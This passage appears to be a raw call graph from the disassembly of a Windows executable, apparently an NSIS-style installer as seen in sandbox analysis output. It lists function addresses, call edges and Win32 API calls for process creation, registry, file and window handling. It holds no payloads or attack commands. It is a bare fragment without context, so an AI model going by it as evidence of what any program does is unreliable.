401dd2 CreateFontIndirectA 3754->3755 3756 40251b 3755->3756 3757 402569 3758 402a68 17 API calls 3757->3758 3761 402573 3758->3761 3759 4025e9 3760 4025a7 ReadFile 3760->3759 3760->3761 3761->3759 3761->3760 3762 4025eb 3761->3762 3763 4025fb 3761->3763 3766 405a52 wsprintfA 3762->3766 3763->3759 3765 402611 SetFilePointer 3763->3765 3765->3759 3766->3759 3455 40176c 3456 402a85 17 API calls 3455->3456 3457 401773 3456->3457 3458 4057fa 2 API calls 3457->3458 3459 40177a 3458->3459 3460 4057fa 2 API calls 3459->3460 3460->3459 3767 4042ec 3768 404322 3767->3768 3769 4042fc 3767->3769 3771 403f5c 8 API calls 3768->3771 3770 403ef5 18 API calls 3769->3770 3772 404309 SetDlgItemTextA 3770->3772 3773 40432e 3771->3773 3772->3768 3774 40196d 3775 402a85 17 API calls 3774->3775 3776 401974 lstrlenA 3775->3776 3777 40251b 3776->3777 3778 4047ee GetDlgItem GetDlgItem 3779 404842 7 API calls 3778->3779 3783 
404a5f 3778->3783 3780 4048e8 DeleteObject 3779->3780 3781 4048db SendMessageA 3779->3781 3782 4048f3 3780->3782 3781->3780 3784 40492a 3782->3784 3787 405b16 17 API calls 3782->3787 3803 404b49 3783->3803 3810 404ad3 3783->3810 3831 40476e SendMessageA 3783->3831 3785 403ef5 18 API calls 3784->3785 3788 40493e 3785->3788 3786 404bf8 3790 404c01 SendMessageA 3786->3790 3791 404c0d 3786->3791 3792 40490c SendMessageA SendMessageA 3787->3792 3794 403ef5 18 API calls 3788->3794 3789 404a52 3796 403f5c 8 API calls 3789->3796 3790->3791 3798 404c26 3791->3798 3799 404c1f ImageList_Destroy 3791->3799 3807 404c36 3791->3807 3792->3782 3811 40494c 3794->3811 3795 404ba2 SendMessageA 3795->3789 3801 404bb7 SendMessageA 3795->3801 3802 404de8 3796->3802 3797 404b3b SendMessageA 3797->3803 3804 404c2f GlobalFree 3798->3804 3798->3807 3799->3798 3800 404d9c 3800->3789 3808 404dae ShowWindow GetDlgItem ShowWindow 3800->3808 3806 404bca 3801->3806 3803->3786 3803->3789 3803->3795 3804->3807 3805 404a20 GetWindowLongA SetWindowLongA 3809 404a39 3805->3809 3818 404bdb SendMessageA 3806->3818 3807->3800 3817 40140b 2 API calls 3807->3817 3825 404c68 3807->3825 3808->3789 3812 404a57 3809->3812 3813 404a3f ShowWindow 3809->3813 3810->3797 3810->3803 3811->3805 3816 40499b SendMessageA 3811->3816 3819 404a1a 3811->3819 3820 4049d7 SendMessageA 3811->3820 3821 4049e8 SendMessageA 3811->3821 3830 403f2a SendMessageA 3812->3830 3829 403f2a SendMessageA 3813->3829 3816->3811 3817->3825 3818->3786 3819->3805 3819->3809 3820->3811 3821->3811 3822 404d72 InvalidateRect 3822->3800 3823 404d88 3822->3823 3836 40468c 3823->3836 3824 404c96 SendMessageA 3828 404cac 3824->3828 3825->3824 3825->3828 3827 404d20 SendMessageA SendMessageA 3827->3828 3828->3822 3828->3827 3829->3789 3830->3783 3832 404791 GetMessagePos ScreenToClient SendMessageA 3831->3832 3833 4047cd SendMessageA 3831->3833 3834 4047ca 3832->3834 3835 4047c5 3832->3835 3833->3835 3834->3833 3835->3810 3837 4046a6 3836->3837 3838 
405b16 17 API calls 3837->3838 3839 4046db 3838->3839 3840 405b16 17 API calls 3839->3840 3841 4046e6 3840->3841 3842 405b16 17 API calls 3841->3842 3843 404717 lstrlenA wsprintfA SetDlgItemTextA 3842->3843 3843->3800 3844 40156f 3845 401586 3844->3845 3846 40157f ShowWindow 3844->3846 3847 401594 ShowWindow 3845->3847 3848 40291a 3845->3848 3846->3845 3847->3848 3849 404def 3850 404e14 3849->3850 3851 404dfd 3849->3851 3852 404e22 IsWindowVisible 3850->3852 3859 404e39 3850->3859 3853 404e03 3851->3853 3867 404e7d 3851->3867 3854 404e2f 3852->3854 3852->3867 3856 403f41 SendMessageA 3853->3856 3858 40476e 5 API calls 3854->3858 3855 404e83 CallWindowProcA 3857 404e0d 3855->3857 3856->3857 3858->3859 3859->3855 3868 405af4 lstrcpynA 3859->3868 3861 404e68 3869 405a52 wsprintfA 3861->3869 3863 404e6f 3864 40140b 2 API calls 3863->3864 3865 404e76 3864->3865 3870 405af4 lstrcpynA 3865->3870 3867->3855 3868->3861 3869->3863 3870->3867 3871 401ef0 3872 402a85 17 API calls 3871->3872 3873 401ef7 3872->3873 3874 405d9c 4 API calls 3873->3874 3875 401efd 3874->3875 3877 401f0f 3875->3877 3878 405a52 wsprintfA 3875->3878 3878->3877 3879 401a71 3880 402a68 17 API calls 3879->3880 3881 401a77 3880->3881 3882 402a68 17 API calls 3881->3882 3883 401a21 3882->3883 3884 401cf2 3885 402a68 17 API calls 3884->3885 3886 401d02 SetWindowLongA 3885->3886 3887 40291a 3886->3887 3888 4028f5 SendMessageA 3889 40291a 3888->3889 3890 40290f InvalidateRect 3888->3890 3890->3889 3156 401e76 3172 402a85 3156->3172 3159 404e9f 24 API calls 3160 401e86 3159->3160 3178 405361 CreateProcessA 3160->3178 3162 401ee2 CloseHandle 3164 4026bf 3162->3164 3163 401eab WaitForSingleObject 3165 401e8c 3163->3165 3166 401eb9 GetExitCodeProcess 3163->3166 3165->3162 3165->3163 3165->3164 3181 405e13 3165->3181 3168 401ed6 3166->3168 3169 401ecb 3166->3169 3168->3162 3171 401ed4 3168->3171 3185 405a52 wsprintfA 3169->3185 3171->3162 3173 402a91 3172->3173 3174 405b16 17 API calls 3173->3174 3175 402ab2 
3174->3175 3176 401e7c 3175->3176 3177 405d03 5 API calls 3175->3177 3176->3159 3177->3176 3179 405390 CloseHandle 3178->3179 3180 40539c 3178->3180 3179->3180 3180->3165 3182 405e30 PeekMessageA 3181->3182 3183 405e40 3182->3183 3184 405e26 DispatchMessageA 3182->3184 3183->3163 3184->3182 3185->3171 3898 402078 3899 402a85 17 API calls 3898->3899 3900 40207f 3899->3900 3901 402a85 17 API calls 3900->3901 3902 402089 3901->3902 3903 402a85 17 API calls 3902->3903 3904 402092 3903->3904 3905 402a85 17 API calls 3904->3905 3906 40209c 3905->3906 3907 402a85 17 API calls 3906->3907 3908 4020a6 3907->3908 3909 4020ba CoCreateInstance 3908->3909 3910 402a85 17 API calls 3908->3910 3913 4020d9 3909->3913 3914 402199 3909->3914 3910->3909 3911 401423 24 API calls 3912 4021bf 3911->3912 3913->3914 3915 40216e MultiByteToWideChar 3913->3915 3914->3911 3914->3912 3915->3914 3916 402678 3917 40267b 3916->3917 3918 402693 3916->3918 3919 402688 FindNextFileA 3917->3919 3919->3918 3920 4026d2 3919->3920 3922 405af4 lstrcpynA 3920->3922 3922->3918 3923 401bf8 3924 402a85 17 API calls 3923->3924 3925 401bff 3924->3925 3926 402a85 17 API calls 3925->3926 3927 401c09 3926->3927 3928 401c36 3927->3928 3929 401c7a 3927->3929 3931 402a68 17 API calls 3928->3931 3930 402a85 17 API calls 3929->3930 3932 401c7f 3930->3932 3933 401c3b 3931->3933 3934 402a85 17 API calls 3932->3934 3935 402a68 17 API calls 3933->3935 3936 401c88 FindWindowExA 3934->3936 3937 401c44 3935->3937 3940 401ca6 3936->3940 3938 401c6a SendMessageA 3937->3938 3939 401c4c SendMessageTimeoutA 3937->3939 3938->3940 3939->3940 3192 4032fa #17 OleInitialize SHGetFileInfoA 3260 405af4 lstrcpynA 3192->3260 3194 403351 GetCommandLineA 3261 405af4 lstrcpynA 3194->3261 3196 403363 GetModuleHandleA 3197 40337a 3196->3197 3198 405612 CharNextA 3197->3198 3199 40338e CharNextA 3198->3199 3210 40339b 3199->3210 3200 403404 3201 403417 GetTempPathA 3200->3201 3262 4032c6 3201->3262 3203 40342d 3205 403451 DeleteFileA 3203->3205 
3206 403431 GetWindowsDirectoryA lstrcatA 3203->3206 3204 405612 CharNextA 3204->3210 3270 402c7d GetTickCount GetModuleFileNameA 3205->3270 3207 4032c6 11 API calls 3206->3207 3209 40344d 3207->3209 3209->3205 3213 4034cf ExitProcess OleUninitialize 3209->3213 3210->3200 3210->3204 3211 403406 3210->3211 3356 405af4 lstrcpynA 3211->3356 3212 403462 3212->3213 3217 405612 CharNextA 3212->3217 3250 4034bb 3212->3250 3215 4034e4 3213->3215 3219 4035c9 3213->3219 3359 4053c2 3215->3359 3223 403479 3217->3223 3220 40364c ExitProcess 3219->3220 3221 405dda 3 API calls 3219->3221 3226 4035d8 3221->3226 3229 403496 3223->3229 3230 4034fa lstrcatA lstrcmpiA 3223->3230 3227 405dda 3 API calls 3226->3227 3228 4035e1 3227->3228 3231 405dda 3 API calls 3228->3231 3233 4056c8 20 API calls 3229->3233 3230->3213 3232 403516 CreateDirectoryA SetCurrentDirectoryA 3230->3232 3234 4035ea 3231->3234 3235 403538 3232->3235 3236 40352d 3232->3236 3237 4034a1 3233->3237 3238 403638 ExitWindowsEx 3234->3238 3244 4035f8 GetCurrentProcess 3234->3244 3364 405af4 lstrcpynA 3235->3364 3363 405af4 lstrcpynA 3236->3363 3237->3213 3357 405af4 lstrcpynA 3237->3357 3238->3220 3241 403645 3238->3241 3243 40140b 2 API calls 3241->3243 3243->3220 3249 403608 3244->3249 3245 4034b0 3358 405af4 lstrcpynA 3245->3358 3247 405b16 17 API calls 3248 403568 DeleteFileA 3247->3248 3251 403575 CopyFileA 3248->3251 3257 403546 3248->3257 3249->3238 3302 4036a1 3250->3302 3251->3257 3252 4035bd 3254 405842 37 API calls 3252->3254 3253 405842 37 API calls 3253->3257 3255 4035c4 3254->3255 3255->3213 3256 405b16 17 API calls 3256->3257 3257->3247 3257->3252 3257->3253 3257->3256 3258 405361 2 API calls 3257->3258 3259 4035a9 CloseHandle 3257->3259 3258->3257 3259->3257 3260->3194 3261->3196 3263 405d03 5 API calls 3262->3263 3265 4032d2 3263->3265 3264 4032dc 3264->3203 3265->3264 3266 4055e7 3 API calls 3265->3266 3267 4032e4 CreateDirectoryA 3266->3267 3365 4057fa 3267->3365 3369 4057cb GetFileAttributesA 
CreateFileA 3270->3369 3272 402cc1 3300 402cce 3272->3300 3370 405af4 lstrcpynA 3272->3370 3274 402ce4 3275 40562e 2 API calls 3274->3275 3276 402cea 3275->3276 3371 405af4 lstrcpynA 3276->3371 3278 402cf5 GetFileSize 3279 402e45 3278->3279 3301 402d0c 3278->3301 3280 402e80 GlobalAlloc 3279->3280 3279->3300 3390 4032af SetFilePointer 3279->3390 3283 402e97 3280->3283 3287 4057fa 2 API calls 3283->3287 3284 402e61 3286 40327d ReadFile 3284->3286 3285 402ed8 3288 402edd DestroyWindow 3285->3288 3285->3300 3289 402e6c 3286->3289 3290 402ea8 CreateFileA 3287->3290 3288->3300 3289->3280 3289->3300 3292 402ee8 3290->3292 3290->3300 3291 402de7 GetTickCount 3295 402df2 CreateDialogParamA 3291->3295 3291->3301 3374 4032af SetFilePointer 3292->3374 3294 405e13 2 API calls 3294->3301 3295->3301 3296 402e37 3296->3279 3298 402e3c DestroyWindow 3296->3298 3297 402ef6 3375 402f71 3297->3375 3298->3279 3300->3212 3301->3285 3301->3291 3301->3294 3301->3296 3301->3300 3372 40327d ReadFile 3301->3372 3303 405dda 3 API calls 3302->3303 3304 4036b5 3303->3304 3305 4036bb 3304->3305 3306 4036cd 3304->3306 3423 405a52 wsprintfA 3305->3423 3307 4059db 3 API calls 3306->3307 3308 4036ee 3307->3308 3309 40370c lstrcatA 3308->3309 3311 4059db 3 API calls 3308->3311 3312 4036cb 3309->3312 3311->3309 3414 403955 3312->3414 3315 4056c8 20 API calls 3316 403734 3315->3316 3317 4037bd 3316->3317 3319 4059db 3 API calls 3316->3319 3318 4056c8 20 API calls 3317->3318 3320 4037c3 3318->3320 3321 403760 3319->3321 3322 4037d3 LoadImageA 3320->3322 3325 405b16 17 API calls 3320->3325 3321->3317 3328 40377c lstrlenA 3321->3328 3332 405612 CharNextA 3321->3332 3323 403887 3322->3323 3324 4037fe RegisterClassA 3322->3324 3327 40140b 2 API calls 3323->3327 3326 40383a SystemParametersInfoA CreateWindowExA 3324->3326 3355 4034cb 3324->3355 3325->3322 3326->3323 3331 40388d 3327->3331 3329 4037b0 3328->3329 3330 40378a lstrcmpiA 3328->3330 3334 4055e7 3 API calls 3329->3334 3330->3329 3333 40379a 
GetFileAttributesA 3330->3333 3337 403955 18 API calls 3331->3337 3331->3355 3335 40377a 3332->3335 3336 4037a6 3333->3336 3338 4037b6 3334->3338 3335->3328 3336->3329 3339 40562e 2 API calls 3336->3339 3340 40389e 3337->3340 3424 405af4 lstrcpynA 3338->3424 3339->3329 3342 403922 3340->3342 3343 4038a6 ShowWindow LoadLibraryA 3340->3343 3425 404f71 OleInitialize 3342->3425 3345 4038c5 LoadLibraryA 3343->3345 3346 4038cc GetClassInfoA 3343->3346 3345->3346 3348 4038e0 GetClassInfoA RegisterClassA 3346->3348 3349 4038f6 DialogBoxParamA 3346->3349 3347 403928 3350 403944 3347->3350 3351 40392c 3347->3351 3348->3349 3352 40140b 2 API calls 3349->3352 3353 40140b 2 API calls 3350->3353 3354 40140b 2 API calls 3351->3354 3351->3355 3352->3355 3353->3355 3354->3355 3355->3213 3356->3201 3357->3245 3358->3250 3360 4053d7 3359->3360 3361 4034f2 ExitProcess 3360->3361 3362 4053eb MessageBoxIndirectA 3360->3362 3362->3361 3363->3235 3364->3257 3366 405805 GetTickCount GetTempFileNameA 3365->3366 3367 405831 3366->3367 3368 4032f8 3366->3368 3367->3366 3367->3368 3368->3203 3369->3272 3370->3274 3371->3278 3373 40329e 3372->3373 3373->3301 3374->3297 3376 402f82 SetFilePointer 3375->3376 3377 402f9e 3375->3377 3376->3377 3391 40309c GetTickCount 3377->3391 3380 402faf ReadFile 3381 402fcf 3380->3381 3386 40305b 3380->3386 3382 40309c 16 API calls 3381->3382 3381->3386 3383 402fe6 3382->3383 3384 403061 ReadFile 3383->3384 3383->3386 3389 402ff6 3383->3389 3384->3386 3386->3300 3387 403011 ReadFile 3387->3386 3387->3389 3388 40302a WriteFile 3388->3386 3388->3389 3389->3386 3389->3387 3389->3388 3390->3284 3392 4030ce 3391->3392 3399 402fa7 3391->3399 3406 4032af SetFilePointer 3392->3406 3394 4030d9 SetFilePointer 3397 4030f9 3394->3397 3395 40327d ReadFile 3395->3397 3397->3395 3398 40316d GetTickCount 3397->3398 3397->3399 3400 405e13 2 API calls 3397->3400 3402 4031d5 WriteFile 3397->3402 3403 40322c SetFilePointer 3397->3403 3407 405ed4 3397->3407 3398->3397 3401 403177 
CreateDialogParamA 3398->3401 3399->3380 3399->3386 3400->3397 3401->3397 3402->3397 3402->3399 3404 40324b 3403->3404 3404->3399 3405 403253 SendMessageA DestroyWindow 3404->3405 3405->3399 3406->3394 3408 405ef9 3407->3408 3409 405f01 3407->3409 3408->3397 3409->3408 3410 405f91 GlobalAlloc 3409->3410 3411 405f88 GlobalFree 3409->3411 3412 406008 GlobalAlloc 3409->3412 3413 405fff GlobalFree 3409->3413 3410->3408 3410->3409 3411->3410 3412->3408 3412->3409 3413->3412 3415 403969 3414->3415 3432 405a52 wsprintfA 3415->3432 3417 4039da 3418 405b16 17 API calls 3417->3418 3419 4039e6 SetWindowTextA 3418->3419 3420 403a02 3419->3420 3421 40371c 3419->3421 3420->3421 3422 405b16 17 API calls 3420->3422 3421->3315 3422->3420 3423->3312 3424->3317 3426 403f41 SendMessageA 3425->3426 3427 404f94 3426->3427 3430 401389 2 API calls 3427->3430 3431 404fbb 3427->3431 3428 403f41 SendMessageA 3429 404fcd OleUninitialize 3428->3429 3429->3347 3430->3427 3431->3428 3432->3417 3461 40177f 3462 402a85 17 API calls 3461->3462 3463 401786 3462->3463 3464 4017a4 3463->3464 3465 4017ac 3463->3465 3500 405af4 lstrcpynA 3464->3500 3501 405af4 lstrcpynA 3465->3501 3468 4017aa 3472 405d03 5 API calls 3468->3472 3469 4017b7 3470 4055e7 3 API calls 3469->3470 3471 4017bd lstrcatA 3470->3471 3471->3468 3478 4017c9 3472->3478 3473 405d9c 4 API calls 3473->3478 3474 4057ac 2 API calls 3474->3478 3476 4017e0 CompareFileTime 3476->3478 3477 4018a4 3479 404e9f 24 API calls 3477->3479 3478->3473 3478->3474 3478->3476 3478->3477 3481 405af4 lstrcpynA 3478->3481 3488 405b16 17 API calls 3478->3488 3494 4053c2 MessageBoxIndirectA 3478->3494 3497 40187b 3478->3497 3499 4057cb GetFileAttributesA CreateFileA 3478->3499 3482 4018ae 3479->3482 3480 404e9f 24 API calls 3483 401890 3480->3483 3481->3478 3484 402f71 21 API calls 3482->3484 3485 4018c1 3484->3485 3486 4018d5 SetFileTime 3485->3486 3487 4018e7 FindCloseChangeNotification 3485->3487 3486->3487 3487->3483 3489 4018f8 3487->3489 3488->3478 3490 
401910 3489->3490 3491 4018fd 3489->3491 3493 405b16 17 API calls 3490->3493 3492 405b16 17 API calls 3491->3492 3495 401905 lstrcatA 3492->3495 3496 401918 3493->3496 3494->3478 3495->3496 3498 4053c2 MessageBoxIndirectA 3496->3498 3497->3480 3497->3483 3498->3483 3499->3478 3500->3468 3501->3469 3941 40197f 3942 402a68 17 API calls 3941->3942 3943 401986 3942->3943 3944 402a68 17 API calls 3943->3944 3945 401990 3944->3945 3946 402a85 17 API calls 3945->3946 3947 401999 3946->3947 3948 4019ac lstrlenA 3947->3948 3953 4019e7 3947->3953 3949 4019b6 3948->3949 3949->3953 3954 405af4 lstrcpynA 3949->3954 3951 4019d0 3952 4019dd lstrlenA 3951->3952 3951->3953 3952->3953 3954->3951 3955 4024ff 3956 402a85 17 API calls 3955->3956 3957 402506 3956->3957 3960 4057cb GetFileAttributesA CreateFileA 3957->3960 3959 402512 3960->3959 3961 401000 3962 401037 BeginPaint GetClientRect 3961->3962 3965 40100c DefWindowProcA 3961->3965 3963 4010f3 3962->3963 3967 401073 CreateBrushIndirect FillRect DeleteObject 3963->3967 3968 4010fc 3963->3968 3966 401179 3965->3966 3967->3963 3969 401102 CreateFontIndirectA 3968->3969 3970 401167 EndPaint 3968->3970 3969->3970 3971 401112 6 API calls 3969->3971 3970->3966 3971->3970 3972 401a00 3973 402a85 17 API calls 3972->3973 3974 401a07 3973->3974 3975 402a85 17 API calls 3974->3975 3976 401a10 3975->3976 3977 401a17 lstrcmpiA 3976->3977 3978 401a29 lstrcmpA 3976->3978 3979 401a1d 3977->3979 3978->3979 3980 401503 3981 402a68 17 API calls 3980->3981 3983 401509 Sleep 3981->3983 3984 40291a 3983->3984 3985 406083 3986 405f07 3985->3986 3987 406872 3986->3987 3988 405f91 GlobalAlloc 3986->3988 3989 405f88 GlobalFree 3986->3989 3990 406008 GlobalAlloc 3986->3990 3991 405fff GlobalFree 3986->3991 3988->3986 3988->3987 3989->3988 3990->3986 3990->3987 3991->3990 3992 402286 3993 402294 3992->3993 3994 40228e 3992->3994 3996 402a85 17 API calls 3993->3996 3998 4022a4 3993->3998 3995 402a85 17 API calls 3994->3995 3995->3993 3996->3998 3997 4022b2 
4000 402a85 17 API calls 3997->4000 3998->3997 3999 402a85 17 API calls 3998->3999 3999->3997 4001 4022bb WritePrivateProfileStringA 4000->4001 4002 404009 lstrcpynA lstrlenA 4003 40230a 4004 40233a 4003->4004 4005 40230f 4003->4005 4007 402a85 17 API calls 4004->4007 4014 402b8f 4005->4014 4009 402341 4007->4009 4008 402316 4010 402a85 17 API calls 4008->4010 4013 402357 4008->4013 4018 402ac5 RegOpenKeyExA 4009->4018 4011 402327 RegDeleteValueA RegCloseKey 4010->4011 4011->4013 4015 402a85 17 API calls 4014->4015 4016 402ba8 4015->4016 4017 402bb6 RegOpenKeyExA 4016->4017 4017->4008 4019 402b3c 4018->4019 4022 402af0 4018->4022 4019->4013 4020 402b16 RegEnumKeyA 4021 402b28 RegCloseKey 4020->4021 4020->4022 4024 405dda 3 API calls 4021->4024 4022->4020 4022->4021 4023 402b4d RegCloseKey 4022->4023 4025 402ac5 3 API calls 4022->4025 4023->4019 4026 402b38 4024->4026 4025->4022 4026->4019 4027 402b68 RegDeleteKeyA 4026->4027 4027->4019 4028 40248a 4029 402b8f 18 API calls 4028->4029 4030 402494 4029->4030 4031 402a68 17 API calls 4030->4031 4032 40249d 4031->4032 4033 4024c0 RegEnumValueA 4032->4033 4034 4024b4 RegEnumKeyA 4032->4034 4035 4026bf 4032->4035 4033->4035 4036 4024d9 RegCloseKey 4033->4036 4034->4036 4036->4035 4038 40280c 4039 402a68 17 API calls 4038->4039 4040 402812 4039->4040 4041 402836 4040->4041 4042 40284d 4040->4042 4048 4026bf 4040->4048 4043 40284a 4041->4043 4044 40283b 4041->4044 4045 402863 4042->4045 4046 402857 4042->4046 4053 405a52 wsprintfA 4043->4053 4052 405af4 lstrcpynA 4044->4052 4047 405b16 17 API calls 4045->4047 4049 402a68 17 API calls 4046->4049 4047->4048 4049->4048 4052->4048 4053->4048 4061 401d0e GetDlgItem GetClientRect 4062 402a85 17 API calls 4061->4062 4063 401d3e LoadImageA SendMessageA 4062->4063 4064 40291a 4063->4064 4065 401d5c DeleteObject 4063->4065 4065->4064 4066 401e0e 4067 402a85 17 API calls 4066->4067 4068 401e14 4067->4068 4069 402a85 17 API calls 4068->4069 4070 401e1d 4069->4070 4071 402a85 17 API 
calls 4070->4071 4072 401e26 wsprintfA 4071->4072 4073 401423 24 API calls 4072->4073 4074 401e44 ShellExecuteA 4073->4074 4075 401e71 4074->4075 4076 401490 4077 404e9f 24 API calls 4076->4077 4078 401497 4077->4078 4079 402412 4080 402b8f 18 API calls 4079->4080 4081 40241c 4080->4081 4082 402a85 17 API calls 4081->4082 4083 402425 4082->4083 4084 4026bf 4083->4084 4085 40242f RegQueryValueExA 4083->4085 4086 40244f 4085->4086 4087 402455 RegCloseKey 4085->4087 4086->4087 4090 405a52 wsprintfA 4086->4090 4087->4084 4090->4087 4091 402892 4092 402a68 17 API calls 4091->4092 4093 402898 4092->4093 4094 4028c9 4093->4094 4095 4026bf 4093->4095 4097 4028a6 4093->4097 4094->4095 4096 405b16 17 API calls 4094->4096 4096->4095 4097->4095 4099 405a52 wsprintfA 4097->4099 4099->4095 4100 40151d SetForegroundWindow 4101 40291a 4100->4101 4102 40149d 4103 4014ab PostQuitMessage 4102->4103 4104 402271 4102->4104 4103->4104 4105 40159d 4106 402a85 17 API calls 4105->4106 4107 4015a4 SetFileAttributesA 4106->4107 4108 4015b6 4107->4108 4109 401f20 4110 402a85 17 API calls 4109->4110 4111 401f27 GetFileVersionInfoSizeA 4110->4111 4112 401f4a GlobalAlloc 4111->4112 4113 401fa0 4111->4113 4112->4113 4114 401f5e GetFileVersionInfoA 4112->4114 4114->4113 4115 401f6f VerQueryValueA 4114->4115 4115->4113 4116 401f88 4115->4116 4120 405a52 wsprintfA 4116->4120 4118 401f94 4121 405a52 wsprintfA 4118->4121 4120->4118 4121->4113 4122 402521 4123 402526 4122->4123 4124 402537 4122->4124 4125 402a68 17 API calls 4123->4125 4126 402a85 17 API calls 4124->4126 4129 40252d 4125->4129 4127 40253e lstrlenA 4126->4127 4127->4129 4128 4026bf 4129->4128 4130 40255d WriteFile 4129->4130 4130->4128 4131 4026a1 4132 402a85 17 API calls 4131->4132 4133 4026a8 FindFirstFileA 4132->4133 4134 4026cb 4133->4134 4138 4026bb 4133->4138 4135 4026d2 4134->4135 4139 405a52 wsprintfA 4134->4139 4140 405af4 lstrcpynA 4135->4140 4139->4135 4140->4138 2880 403a22 2881 403b75 2880->2881 2882 403a3a 2880->2882 2884 
403bc6 2881->2884 2885 403b86 GetDlgItem GetDlgItem 2881->2885 2882->2881 2883 403a46 2882->2883 2886 403a51 SetWindowPos 2883->2886 2887 403a64 2883->2887 2889 403c20 2884->2889 2979 401389 2884->2979 2953 403ef5 2885->2953 2886->2887 2890 403a81 2887->2890 2891 403a69 ShowWindow 2887->2891 2898 403b70 2889->2898 2959 403f41 2889->2959 2894 403aa3 2890->2894 2895 403a89 DestroyWindow 2890->2895 2891->2890 2892 403bb0 KiUserCallbackDispatcher 2956 40140b 2892->2956 2900 403aa8 SetWindowLongA 2894->2900 2901 403ab9 2894->2901 2899 403e9f 2895->2899 2899->2898 2908 403eaf ShowWindow 2899->2908 2900->2898 2905 403b62 2901->2905 2906 403ac5 GetDlgItem 2901->2906 2903 40140b 2 API calls 2921 403c32 2903->2921 2904 403e80 DestroyWindow EndDialog 2904->2899 2965 403f5c 2905->2965 2909 403af5 2906->2909 2910 403ad8 SendMessageA IsWindowEnabled 2906->2910 2907 403bfc SendMessageA 2907->2898 2908->2898 2913 403b02 2909->2913 2914 403b15 2909->2914 2915 403b49 SendMessageA 2909->2915 2924 403afa 2909->2924 2910->2898 2910->2909 2913->2915 2913->2924 2918 403b32 2914->2918 2919 403b1d 2914->2919 2915->2905 2917 403ef5 18 API calls 2917->2921 2923 40140b 2 API calls 2918->2923 2922 40140b 2 API calls 2919->2922 2920 403b30 2920->2905 2921->2903 2921->2904 2921->2917 2926 403ef5 18 API calls 2921->2926 2983 405b16 2921->2983 2922->2924 2925 403b39 2923->2925 2962 403ece 2924->2962 2925->2905 2925->2924 2927 403cad GetDlgItem 2926->2927 2928 403cc2 2927->2928 2929 403cca ShowWindow EnableWindow 2927->2929 2928->2929 3000 403f17 EnableWindow 2929->3000 2931 403cf4 EnableWindow 2934 403d08 2931->2934 2932 403d0d GetSystemMenu EnableMenuItem SendMessageA 2933 403d3d SendMessageA 2932->2933 2932->2934 2933->2934 2934->2932 3001 403f2a SendMessageA 2934->3001 3002 405af4 lstrcpynA 2934->3002 2937 403d6b lstrlenA 2938 405b16 17 API calls 2937->2938 2939 403d7c SetWindowTextA 2938->2939 2940 401389 2 API calls 2939->2940 2942 403d8d 2940->2942 2941 403dc0 DestroyWindow 2941->2899 2943 
403dda CreateDialogParamA 2941->2943 2942->2898 2942->2921 2942->2941 2944 403dbb 2942->2944 2943->2899 2945 403e0d 2943->2945 2944->2898 2946 403ef5 18 API calls 2945->2946 2947 403e18 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2946->2947 2948 401389 2 API calls 2947->2948 2949 403e5e 2948->2949 2949->2898 2950 403e66 ShowWindow 2949->2950 2951 403f41 SendMessageA 2950->2951 2952 403e7e 2951->2952 2952->2899 2954 405b16 17 API calls 2953->2954 2955 403f00 SetDlgItemTextA 2954->2955 2955->2892 2957 401389 2 API calls 2956->2957 2958 401420 2957->2958 2958->2884 2960 403f59 2959->2960 2961 403f4a SendMessageA 2959->2961 2960->2921 2961->2960 2963 403ed5 2962->2963 2964 403edb SendMessageA 2962->2964 2963->2964 2964->2920 2966 403ffd 2965->2966 2967 403f74 GetWindowLongA 2965->2967 2966->2898 2967->2966 2968 403f85 2967->2968 2969 403f94 GetSysColor 2968->2969 2970 403f97 2968->2970 2969->2970 2971 403fa7 SetBkMode 2970->2971 2972 403f9d SetTextColor 2970->2972 2973 403fc5 2971->2973 2974 403fbf GetSysColor 2971->2974 2972->2971 2975 403fd6 2973->2975 2976 403fcc SetBkColor 2973->2976 2974->2973 2975->2966 2977 403ff0 CreateBrushIndirect 2975->2977 2978 403fe9 DeleteObject 2975->2978 2976->2975 2977->2966 2978->2977 2980 401390 2979->2980 2981 4013fe 2980->2981 2982 4013cb MulDiv SendMessageA 2980->2982 2981->2889 2981->2907 2982->2980 2999 405b26 2983->2999 2984 405cea 2985 405cff 2984->2985 3019 405af4 lstrcpynA 2984->3019 2985->2921 2987 405cc1 lstrlenA 2987->2999 2989 405bfe GetSystemDirectoryA 2989->2999 2991 405b16 10 API calls 2991->2987 2993 405c11 GetWindowsDirectoryA 2993->2999 2994 405c21 SHGetSpecialFolderLocation 2995 405c3a SHGetPathFromIDListA CoTaskMemFree 2994->2995 2994->2999 2995->2999 2996 405c68 lstrcatA 2996->2999 2998 405b16 10 API calls 2998->2999 2999->2984 2999->2987 2999->2989 2999->2991 2999->2993 2999->2994 2999->2996 2999->2998 3003 4059db RegOpenKeyExA 2999->3003 3008 405d03 2999->3008 3017 405a52 wsprintfA 2999->3017 3018 
405af4 lstrcpynA 2999->3018 3000->2931 3001->2934 3002->2937 3004 405a4c 3003->3004 3005 405a0e RegQueryValueExA 3003->3005 3004->2999 3006 405a2f RegCloseKey 3005->3006 3006->3004 3015 405d0f 3008->3015 3009 405d77 3010 405d7b CharPrevA 3009->3010 3013 405d96 3009->3013 3010->3009 3011 405d6c CharNextA 3011->3009 3011->3015 3013->2999 3014 405d5a CharNextA 3014->3015 3015->3009 3015->3011 3015->3014 3016 405d67 CharNextA 3015->3016 3020 405612 3015->3020 3016->3011 3017->2999 3018->2999 3019->2985 3021 405618 3020->3021 3022 40562b 3021->3022 3023 40561e CharNextA 3021->3023 3022->3015 3023->3021 4148 401923 4149 40195a 4148->4149 4150 402a85 17 API calls 4149->4150 4151 40195f 4150->4151 4152 405426 69 API calls 4151->4152 4153 401968 4152->4153 4159 404626 4160 404652 4159->4160 4161 404636 4159->4161 4162 404685 4160->4162 4163 404658 SHGetPathFromIDListA 4160->4163 4170 4053a6 GetDlgItemTextA 4161->4170 4165 40466f SendMessageA 4163->4165 4166 404668 4163->4166 4165->4162 4168 40140b 2 API calls 4166->4168 4167 404643 SendMessageA 4167->4160 4168->4165 4170->4167 4171 401926 4172 402a85 17 API calls 4171->4172 4173 40192d 4172->4173 4174 4053c2 MessageBoxIndirectA 4173->4174 4175 401936 4174->4175 4176 40152b 4177 402a68 17 API calls 4176->4177 4178 401532 4177->4178 4179 401fab SetErrorMode 4180 402061 4179->4180 4181 401fc8 4179->4181 4183 401423 24 API calls 4180->4183 4182 402a85 17 API calls 4181->4182 4184 401fcf 4182->4184 4185 40206c SetErrorMode 4183->4185 4186 402a85 17 API calls 4184->4186 4187 40291a 4185->4187 4188 401fd7 4186->4188 4189 401fec LoadLibraryExA 4188->4189 4190 401fdf 